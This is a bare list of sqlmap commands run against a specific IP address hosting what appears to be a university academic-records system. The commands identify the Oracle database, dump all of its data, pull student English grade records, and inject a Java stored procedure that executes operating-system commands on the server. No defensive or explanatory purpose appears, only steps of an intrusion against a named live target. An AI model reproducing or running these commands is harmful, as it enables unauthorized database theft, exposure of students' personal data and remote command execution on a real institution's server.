http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1
sqlmap -u "http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1" -v 2 --dbms "Oracle"
sqlmap -u "http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1" --dump-all --exclude-sysdbs -v 0
sqlmap -u "http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1" --sql-query "SELECT * FROM ALL_TABLES" -v 0
sqlmap -u "http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1" --dump-all -v 0
sqlmap -u "http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1" --sql-query "select table_name from user_tables" -v 0
sqlmap -u "http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1" --sql-query "USE JIAOWU" -v 0
ENGLISH_GRADE_RX
select USERID,SCORE,SCORE_Y from ENGLISH_GRADE_RX
sqlmap -u "http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1" --sql-query 'create or replace and compile java souRCe named "util" as import java.io.*;import java.lang.*;public class util extends Object{public static int RunThis(String args){Runtime rt = Runtime.getRuntime();int RC = -1;try{Process p = rt.exec(args);int bufSize = 4096;BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);int len;byte buffer[] = new byte[bufSize];while ((len = bis.read(buffer, 0, bufSize)) != -1)System.out.write(buffer, 0, len);RC = p.waitFor();}catch (Exception e){e.printStackTrace();RC = -1;}finally{return RC;}}}' -v 0
sqlmap -u "http://60.18.131.131/lntu/jxrl/jxrl.jsp?select=13--1" --sql-query "select count(*) from all_tab_comments t where t.owner='jiaowu' and t.table_type='TABLE'" -v 0
